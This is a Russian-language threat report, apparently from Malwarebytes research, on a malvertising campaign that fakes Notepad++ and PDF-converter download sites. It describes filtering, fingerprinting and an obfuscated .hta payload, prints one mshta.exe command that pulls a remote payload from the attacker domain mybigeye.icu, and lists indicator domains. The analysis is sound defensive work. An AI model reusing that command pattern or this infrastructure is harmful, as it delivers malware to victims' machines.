Угроза направлена на Notepad++, популярный текстовый редактор для Windows, а также на аналогичные программы, такие как PDF-конвертеры. На изображении ниже представлен коллаж из вредоносных рекламных объявлений, которые мы наблюдали в последнее время. Все они были запущены одним и тем же угрожающим агентом, но через разные рекламные аккаунты, вероятно, скомпрометированные.
Первый уровень фильтрации происходит, когда пользователь нажимает на одну из таких реклам. Скорее всего, это проверка IP-адреса, которая отсеивает VPN и другие неподлинные IP-адреса и вместо них показывает сайт-обманку.
Однако целевая аудитория увидит копию настоящего сайта Notepad++, расположенного по адресу notepadxtreme[.]com.
Второй уровень фильтрации происходит, когда пользователь переходит по ссылке на загрузку, где JavaScript-код выполняет отпечаток системы. Если ни одна из проверок не проходит, пользователь перенаправляется на легитимный сайт Notepad++. Каждой потенциальной жертве присваивается уникальный идентификатор, который позволяет загрузить полезную нагрузку.
Еще одна особенность, отличающая эту кампанию от других, - способ загрузки полезной нагрузки. Каждому пользователю присваивается уникальный идентификатор, имеющий следующий формат:
CukS1=[10-символьная строка][13 цифр]Вероятно, это делается в целях отслеживания, а также для того, чтобы сделать каждую загрузку уникальной и чувствительной к времени.
Файл .hta, полученный нами в ходе расследования, не был полностью готовым к использованию. Однако нам удалось найти другой, который был загружен на VirusTotal в начале июля. В нем используется то же самое соглашение об именовании, и мы видим, что вместо Notepad++ в качестве приманки использовался "PDF Converter".
Скрипт хорошо обфусцирован и имеет 0 обнаружений на VirusTotal. Однако при динамическом анализе обнаруживается соединение с удаленным доменом (mybigeye[.]icu) на пользовательском порту:
C:\Windows\SysWOW64\mshta.exe "C:\Windows\System32\mshta.exe"
https://mybigeye .icu:52054/LXGZlAJgmvCaQfer/rWABCTDEqFVGdHIQ.html?client_id=jurmvozdcf1687983013426#he7HAp1X4cgqv5SJykr3lRtaxijL0WPB6sdGnZC9IouwDKf8OEMQTFNbmYzU2V+/=Malwarebytes также заметили, что при удаленном подключении используется тот же client_id, что и в имени файла.
Хотя мы не знаем, что произойдет дальше, Malwarebytes полагают, что это часть вредоносной инфраструктуры, используемой угрожающими субъектами для получения доступа к машинам жертв с помощью таких инструментов, как Cobalt Strike.
Indicators of Compromise
Domains
- jquerywins.com
- karelisweb.com
- mojenyc.com
- mybigeye.icu
- notepadxtreme.com
- switcodes.com